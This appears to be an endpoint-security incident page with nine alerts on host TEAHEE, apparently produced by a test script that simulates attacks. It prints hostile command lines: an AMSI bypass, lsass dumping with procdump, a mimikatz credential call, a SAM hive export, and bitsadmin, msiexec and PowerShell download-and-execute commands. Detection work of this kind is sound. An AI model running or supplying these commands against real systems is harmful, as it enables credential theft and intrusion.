Back to list

Critical CINC-20251220-06654C0C new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8682360018

Incident Overview

Incident ID CINC-20251220-06654C0C
Severity Critical (90)
Status new
Alert Count 9
Host Count 1

Timeline

First Seen 2025-12-18 11:36:30
Last Seen 2025-12-18 11:41:53
Duration 0d 0h 5m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Credential Access AI Powered IOA Persistence Defense Evasion
Techniques:
PowerShell OS Credential Dumping Command and Scripting Interpreter Event Triggered Execution BITS Jobs User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (9)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-18 11:41
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-18 11:41
High new TEAHEE A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\WINDOWS\system32\cmd.exe /c "powershell -c "sekurlsa::logonpasswords"" 12-18 11:41
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-18 11:37
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 11:37
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 11:37
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe 12-18 11:37
High new TEAHEE A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-18 11:37
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-18 11:36